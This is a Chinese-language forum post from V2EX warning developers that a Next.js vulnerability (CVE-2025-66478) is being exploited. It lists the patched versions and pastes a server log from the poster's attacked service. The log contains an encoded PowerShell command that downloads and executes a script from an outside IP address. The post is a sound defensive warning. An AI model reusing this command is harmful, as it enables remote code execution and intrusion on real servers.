今天我们一个服务的受到攻击, 还好容器化+预警,没造成什么大的后果. 大家尽快去看一下自己 nextjs 版本是否有问题, 尽量升级修复
https://nextjs.org/blog/CVE-2025-66478
该漏洞已在以下已修复的 Next.js 版本中完全解决:
15.0.5 15.1.9 15.2.6 15.3.6 15.4.8 15.5.7 15.6.0-canary.58 16.0.7
2025-12-05T14:26:57.261834840+08:00 /bin/sh: 1: powershell: not found
2025-12-05T14:26:57.281016164+08:00 ⨯ [Error: Command failed: powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AMgAwADkALgAxADAAMwA6ADYAMwA5ADMAOAAvAG4AcgBDAHIAUQAnACkA
2025-12-05T14:26:57.281027836+08:00 /bin/sh: 1: powershell: not found
2025-12-05T14:26:57.281030581+08:00 ] {
2025-12-05T14:26:57.281033386+08:00 status: 127,
2025-12-05T14:26:57.281035610+08:00 signal: null,
2025-12-05T14:26:57.281038285+08:00 output: [Array],
2025-12-05T14:26:57.281040579+08:00 pid: 54,
2025-12-05T14:26:57.281042744+08:00 stdout: <Buffer >,
2025-12-05T14:26:57.281045459+08:00 stderr: <Buffer 2f 62 69 6e 2f 73 68 3a 20 31 3a 20 70 6f 77 65 72 73 68 65 6c 6c 3a 20 6e 6f 74 20 66 6f 75 6e 64 0a>,
2025-12-05T14:26:57.281047643+08:00 digest: '1126005934'
2025-12-05T14:26:57.281049837+08:00 }
这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。
V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。
V2EX is a community of developers, designers and creative people.